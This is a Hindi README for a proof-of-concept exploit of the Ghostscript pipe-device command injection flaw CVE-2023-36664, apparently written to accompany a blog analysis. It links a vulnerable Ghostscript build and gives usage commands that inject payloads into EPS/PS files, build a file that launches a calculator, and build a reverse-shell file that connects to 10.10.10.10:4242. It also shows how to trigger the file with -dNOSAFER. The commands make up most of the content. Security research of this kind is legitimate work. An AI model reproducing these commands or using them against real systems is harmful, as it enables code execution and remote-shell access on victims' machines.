
Ghostscript कमांड इंजेक्शन (CVE-2023-36664) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें पेलोड जनरेशन और कोड निष्पादन हेतु EPS/PS फ़ाइलों में इंजेक्शन शामिल है।
Ghostscript के संस्करण 10.01.2 से पहले की भेद्यता कोड निष्पादन की ओर ले जाती है (CVSS स्कोर 9.8)।
आधिकारिक भेद्यता विवरण:
Artifex Ghostscript 10.01.2 तक पाइप उपकरणों (%pipe% उपसर्ग या | पाइप कैरेक्टर उपसर्ग के साथ) के लिए अनुमति सत्यापन को गलत तरीके से संभालता है।
डेबियन ने एक सुरक्षा सलाह जारी की जिसमें मनमाने आदेशों के संभावित निष्पादन का उल्लेख किया गया:
"यह पाया गया कि Ghostscript, GPL PostScript/PDF दुभाषिया, पाइप उपकरणों के लिए अनुमति सत्यापन को ठीक से नहीं संभालता है, जिसके परिणामस्वरूप यदि दूषित दस्तावेज़ फ़ाइलों को संसाधित किया जाता है तो मनमाने आदेशों का निष्पादन हो सकता है।"
यह रिपॉजिटरी vsociety ब्लॉग पर उपलब्ध CVE विश्लेषण ब्लॉग पोस्ट के लिए बनाई गई है।
यहाँ से Ghostscript 10.01.1 डाउनलोड करें: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs10011 विंडोज x64 निष्पादन योग्य का सीधा लिंक: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10011/gs10011w64.exe
शोषण PS या EPS फ़ाइल खोलने पर हो सकता है और Ghostscript द्वारा पाइप उपकरणों के लिए अनुमति सत्यापन को गलत तरीके से संभालने के कारण कोड निष्पादन की अनुमति दे सकता है।
उपयोग: python3 CVE_2023_36664_exploit.py <input_file> <command>
उदाहरण:
python3 CVE_2023_36664_exploit.py file.eps "calc"
यह file_injected.eps नामक एक नई फ़ाइल उत्पन्न करता है।
इसे कैलकुलेटर को ट्रिगर करने के लिए Ghostscript के साथ खोलें (संस्करण 9.50 के बाद से आपको -dNOSAFER विकल्प का भी उपयोग करना होगा):
gs10011w64.exe -dNOSAFER .\file_injected.eps
अन्य उदाहरण: run_calculator.eps नामक एक नई EPS फ़ाइल पेलोड "calc" के साथ उत्पन्न करें (विंडोज पर एक नया कैलकुलेटर पॉप अप होता है)
python3 CVE_2023_36664_exploit.py --generate --payload calc --filename run_calculator --extension eps
rev_shell.eps नामक एक नई EPS फ़ाइल कस्टम IP के साथ उत्पन्न करें (Unix पर ट्रिगर होने पर रिवर्स शेल शुरू करें)
python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.10.10 -port 4242 --filename trigger_revshell --extension eps
malicius.ps नामक एक नई PS फ़ाइल पेलोड "calc" के साथ उत्पन्न करें (विंडोज पर एक नया कैलकुलेटर पॉप अप होता है)
python3 CVE_2023_36664_exploit.py -g -p "calc" -x ps
file.eps नामक मौजूदा फ़ाइल में दुर्भावनापूर्ण कस्टम पेलोड ("calc") इंजेक्ट करें (विंडोज पर एक नया कैलकुलेटर पॉप अप होता है)
python3 CVE_2023_36664_exploit.py --inject --payload "calc" --filename file.eps
यह सॉफ्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत स्थानों को छोड़कर सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।